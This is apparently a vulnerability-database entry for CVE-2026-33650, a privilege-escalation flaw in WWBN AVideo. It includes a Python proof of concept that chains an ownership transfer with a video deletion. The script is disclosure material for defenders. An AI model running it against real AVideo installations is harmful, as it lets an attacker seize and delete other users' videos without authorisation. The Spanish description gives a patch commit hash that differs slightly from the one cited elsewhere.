Security Vulnerability Report
中文
CVE-2026-33650 CVSS 7.6 HIGH

CVE-2026-33650

Published: 2026-03-23 19:16:41
Last Modified: 2026-03-25 18:00:14
Source: [email protected]

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, a user with the "Videos Moderator" permission can escalate privileges to perform full video management operations — including ownership transfer and deletion of any video — despite the permission being documented as only allowing video publicity changes (Active, Inactive, Unlisted). The root cause is that `Permissions::canModerateVideos()` is used as an authorization gate for full video editing in `videoAddNew.json.php`, while `videoDelete.json.php` only checks ownership, creating an asymmetric authorization boundary exploitable via a two-step ownership-transfer-then-delete chain. Commit 838e16818c793779406ecbf34ebaeba9830e33f8 contains a patch.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://example.com" attacker_session = "SESSION_COOKIE_HERE" # Cookie for user with 'Videos Moderator' role target_video_id = 123 attacker_user_id = 456 headers = { "Cookie": f"PHPSESSID={attacker_session}" } # Step 1: Transfer ownership of the target video to the attacker # Exploiting the logic in videoAddNew.json.php where canModerateVideos() allows editing ownership edit_payload = { "id": target_video_id, "owners_id": attacker_user_id, # Parameter to change owner # ... other necessary parameters for the endpoint } print("[*] Attempting to transfer ownership...") response = requests.post(f"{target_url}/videoAddNew.json.php", data=edit_payload, headers=headers) if response.status_code == 200 and "success" in response.text: print("[+] Ownership transferred successfully.") else: print("[-] Failed to transfer ownership.") exit() # Step 2: Delete the video # Exploiting videoDelete.json.php which only checks ownership (now owned by attacker) delete_payload = { "id": target_video_id } print("[*] Attempting to delete video...") response = requests.post(f"{target_url}/videoDelete.json.php", data=delete_payload, headers=headers) if response.status_code == 200 and "success" in response.text: print("[+] Video deleted successfully.") else: print("[-] Failed to delete video.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33650", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:41.223", "lastModified": "2026-03-25T18:00:14.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, a user with the \"Videos Moderator\" permission can escalate privileges to perform full video management operations — including ownership transfer and deletion of any video — despite the permission being documented as only allowing video publicity changes (Active, Inactive, Unlisted). The root cause is that `Permissions::canModerateVideos()` is used as an authorization gate for full video editing in `videoAddNew.json.php`, while `videoDelete.json.php` only checks ownership, creating an asymmetric authorization boundary exploitable via a two-step ownership-transfer-then-delete chain. Commit 838e16818c793779406ecbf34ebaeba9830e33f8 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, un usuario con el permiso 'Moderador de Videos' puede escalar privilegios para realizar operaciones completas de gestión de videos — incluyendo la transferencia de propiedad y la eliminación de cualquier video — a pesar de que el permiso está documentado como que solo permite cambios en la publicidad de videos (Activo, Inactivo, No listado). La causa raíz es que `Permissions::canModerateVideos()` se utiliza como una puerta de autorización para la edición completa de videos en `videoAddNew.json.php`, mientras que `videoDelete.json.php` solo verifica la propiedad, creando un límite de autorización asimétrico explotable a través de una cadena de dos pasos de transferencia de propiedad y luego eliminación. El commit 838e16818c793779406ecbf34ebaeba9830e33f7 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/838e16818c793779406ecbf34ebaeba9830e33f8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8x77-f38v-4m5j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8x77-f38v-4m5j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.